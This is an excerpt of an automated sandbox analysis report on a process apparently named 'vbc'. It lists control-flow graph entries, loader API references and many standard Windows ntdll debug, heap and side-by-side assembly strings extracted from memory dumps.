                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 97 417a50-417a51 98 417a53-417a56 97->98 99 4179d8-4179e1 97->99 100 4179e3-4179f7 LdrLoadDll 99->100 101 4179fa-4179fd 99->101 100->101
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 102 58c2c0a-58c2c0f 103 58c2c1f-58c2c26 LdrInitializeThunk 102->103 104 58c2c11-58c2c18 102->104
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Strings
                                                                                    • a NULL pointer, xrefs: 05938F90
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 05938F3F
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05938E3F
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05938F26
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05938DC4
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05938DB5
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05938FEF
                                                                                    • *** then kb to get the faulting stack, xrefs: 05938FCC
                                                                                    • an invalid address, %p, xrefs: 05938F7F
                                                                                    • The critical section is owned by thread %p., xrefs: 05938E69
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 05938E02
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05938E86
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 05938E24
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 05938DA3
                                                                                    • write to, xrefs: 05938F56
                                                                                    • read from, xrefs: 05938F5D, 05938F62
                                                                                    • *** enter .cxr %p for the context, xrefs: 05938FBD
                                                                                    • This failed because of error %Ix., xrefs: 05938EF6
                                                                                    • The instruction at %p tried to %s , xrefs: 05938F66
                                                                                    • The resource is owned shared by %d threads, xrefs: 05938E2E
                                                                                    • *** enter .exr %p for the exception record, xrefs: 05938FA1
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05938F34
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 05938E4B
                                                                                    • *** Inpage error in %ws:%s, xrefs: 05938EC8
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05938F2D
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 05938EE2
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05938DD3
                                                                                    • <unknown>, xrefs: 05938D2E, 05938D81, 05938E00, 05938E49, 05938EC7, 05938F3E
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05938D8C
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 05938E75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    Strings
                                                                                    • Critical section debug info address, xrefs: 058F541F, 058F552E
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54E2
                                                                                    • Thread identifier, xrefs: 058F553A
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54CE
                                                                                    • Critical section address, xrefs: 058F5425, 058F54BC, 058F5534
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F540A, 058F5496, 058F5519
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 058F5543
                                                                                    • corrupted critical section, xrefs: 058F54C2
                                                                                    • undeleted critical section in freed memory, xrefs: 058F542B
                                                                                    • 8, xrefs: 058F52E3
                                                                                    • double initialized or corrupted critical section, xrefs: 058F5508
                                                                                    • Critical section address., xrefs: 058F5502
                                                                                    • Invalid debug info address of this critical section, xrefs: 058F54B6
                                                                                    • Address of the debug info found in the active list., xrefs: 058F54AE, 058F54FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-3197712848
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    Strings
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 058F28B2
                                                                                    • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 058F2881
                                                                                    • @, xrefs: 058B3180
                                                                                    • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 058F29AC
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 058F292E
                                                                                    • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 058F2856
                                                                                    • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 058F29B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                    Strings
                                                                                    • LdrpProtectedCopyMemory, xrefs: 05904DF4
                                                                                    • Execute '.cxr %p' to dump context, xrefs: 05904EB1
                                                                                    • ***Exception thrown within loader***, xrefs: 05904E27
                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 05904E06
                                                                                    • LdrpGenericExceptionFilter, xrefs: 05904DFC
                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05904E38
                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05904DF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    Strings
                                                                                    • @, xrefs: 058B2E4D
                                                                                    • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 058F279C
                                                                                    • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 058F276F
                                                                                    • \WinSxS\, xrefs: 058B2E23
                                                                                    • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 058F2706
                                                                                    • .Local\, xrefs: 058B2D91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                    Strings
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 058D9A2A
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058D99ED
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058D9A11, 058D9A3A
                                                                                    • LdrpInitShimEngine, xrefs: 058D99F4, 058D9A07, 058D9A30
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 058D9A01
                                                                                    • apphelp.dll, xrefs: 05876496
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    Strings
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 058F81E5
                                                                                    • LdrpInitializeProcess, xrefs: 058BC6C4
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 058F8181, 058F81F5
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058BC6C3
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 058F8170
                                                                                    • LdrpInitializeImportRedirection, xrefs: 058F8177, 058F81EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 058F2178
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 058F2180
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 058F219F
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058F21BF
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 058F2160, 058F219A, 058F21BA
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 058F2165
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    APIs
                                                                                      • Part of subcall function 058C2DF0: LdrInitializeThunk.NTDLL ref: 058C2DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    Strings
                                                                                    • LdrpInitializeProcess, xrefs: 058B8422
                                                                                    • @, xrefs: 058B8591
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 058B855E
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058B8421
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    Strings
                                                                                    • HEAP[%wZ]: , xrefs: 058E54D1, 058E5592
                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 058E55AE
                                                                                    • HEAP: , xrefs: 058E54E0, 058E55A1
                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 058E54ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                    • API String ID: 0-1657114761
                                                                                    Strings
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058F22B6
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058F21D9, 058F22B1
                                                                                    • .Local, xrefs: 058B28D8
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 058F21DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 058E1028
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 058E106B
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 058E0FE5
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058E10AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    Strings
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 058F365C
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 058F362F
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 058F3640, 058F366C
                                                                                    • LdrpFindDllActivationContext, xrefs: 058F3636, 058F3662
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 0-3779518884
                                                                                    Strings
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 058EA992
                                                                                    • LdrpDynamicShimModule, xrefs: 058EA998
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058EA9A2
                                                                                    • apphelp.dll, xrefs: 058A2462
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    Strings
                                                                                    • @, xrefs: 0587CD63
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0587CD34
                                                                                    • InstallLanguageFallback, xrefs: 0587CD7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                    • API String ID: 0-1757540487
                                                                                    Strings
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 058F82DE
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058F82E8
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 058F82D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    Strings
                                                                                    • @, xrefs: 0593C1F1
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0593C1C5
                                                                                    • PreferredUILanguages, xrefs: 0593C212
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 0590488F
